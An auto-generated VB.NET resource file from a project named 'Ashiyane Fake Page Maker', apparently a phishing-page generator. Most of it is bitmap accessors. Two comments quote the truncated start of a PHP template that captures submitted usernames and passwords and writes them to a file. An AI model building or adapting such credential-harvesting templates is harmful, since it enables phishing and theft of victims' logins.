'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.1
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Ashiyane_Fake_Page_Maker.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        Friend ReadOnly Property b_l() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("b-l", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property b_r() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("b-r", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property b_rep() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("b-rep", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property back() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("back", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property center() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("center", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property l_rep() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("l-rep", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property r_rep() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("r-rep", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?php
        '''/**
        '''* @author Reza-_S4T4N
        '''* @copyright 2013
        '''*/
        '''$rs4_user = $_REQUEST[&apos;{0}&apos;];
        '''$rs4_passwd = $_REQUEST[&apos;{1}&apos;];
        '''$rs4_filename = &apos;{2}&apos;;
        '''$rs4_title = &apos;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
        ''' This File Created By Ashiyane Fake Page Maker By Reza_S4T4N 
        '''-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
        '''&apos;;
        '''if (!file_exists($rs4_filename)) {
        '''    if (!$handle = fopen($rs4_filename, &apos;a&apos;)) {
        '''         exit;
        '''    }
        '''    if (fwrite($handle, $rs4_title) === FALSE)  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Save_in_Text() As String
            Get
                Return ResourceManager.GetString("Save_in_Text", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?php
        '''/**
        '''* @author Reza-_S4T4N
        '''* @copyright 2013
        '''*/
        '''$rs4_user = $_REQUEST[&apos;{0}&apos;];
        '''$rs4_passwd = $_REQUEST[&apos;{1}&apos;];
        '''$rs4_filename = &apos;{2}&apos;;
        '''$rs4_title = &apos;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
        ''' This File Created By Ashiyane Fake Page Maker By Reza_S4T4N 
        '''-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
        '''&apos;;
        '''if (!file_exists($rs4_filename)) {
        '''    if (!$handle = fopen($rs4_filename, &apos;a&apos;)) {
        '''         exit;
        '''    }
        '''    if (fwrite($handle, $rs4_title) === FALSE)  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Send_email() As String
            Get
                Return ResourceManager.GetString("Send_email", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property t_l() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("t-l", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property t_r() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("t-r", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        Friend ReadOnly Property t_rep() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("t-rep", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
    End Module
End Namespace
